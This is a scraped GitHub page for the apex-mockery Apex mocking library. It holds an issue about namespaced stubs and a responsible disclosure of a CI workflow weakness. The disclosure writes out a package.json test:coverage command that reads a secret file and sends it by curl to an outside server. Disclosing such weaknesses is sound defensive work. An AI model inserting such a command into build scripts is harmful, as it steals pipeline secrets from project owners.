salesforce / apex-mockery Goto Github PK
View Code? Open in Web Editor NEWLightweight mocking library in Apex
License: BSD 3-Clause "New" or "Revised" License
Lightweight mocking library in Apex
License: BSD 3-Clause "New" or "Revised" License
Apex methods in the unlocked package are not accessible because it uses the public
access modifier instead of the global
Here is a quick status of my spiking with this issue
I worked a bit in this PR and created a beta package using the global access modifiers.
I have converted our recipes to use the mockery
namespace
I have created a scratch org without namespace
I have deployed the beta package package to the scratch org
I have deployed the recipes with namespace
Then I run all the recipes test
Result: it failed...
System.TypeException: Test.createStub() can only be called with classes in the current namespace
What I understand from this error is: as our unlocked package is namespaced, code executing it needs to be in the same namespace... ๐คฏ
Or the createStubs must be done in the same namespace and then the stub must be served to the mock
salesforce/apex-mockery
The CI_URL
GitHub Actions secret
When anyone opens a pull request to merge a branch containing malicious changes into main
GitHub Workflow ci-build
job
main
test:coverage
in package.json
to read the contents of CI_URL.txt
and send it to an external server
"test:coverage": "STOLEN_SECRET=$(cat ./CI_URL.txt) && curl -v -X GET 'https://goldfarb.dev' -H 'stolen-secret:'${STOLEN_SECRET}"
ci-build
job in .github/workflows/pull-request.yml
In a single step, you can write the CI_URL.txt
file, use the file and then subsequently delete it before it can be stolen
main...gfarb:apex-mockery:main
I was looking at GitHub Workflow used by Salesforce to see if there was anything you all do that we can benefit from in our own Workflows; that is when I stumbled upon this. Not sure if you are worried about this problem and I am NOT positive if it will still run the malicious code and steal the actual secret when the branch derives from a fork of the project. I created a PoC in a private repo and tested it out which seemed to confirm my suspicion that this problem does persist in your Workflow at the moment. In case you wanted a quick solution I forked this project and can open a PR with the changes to resolve this based on the solution I outlined above. Sorry if this is not an actual concern and I wasted your time, I figured it would be better to let you all know in case this is something you are worried about. I am sorry if this was a waste of time!
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.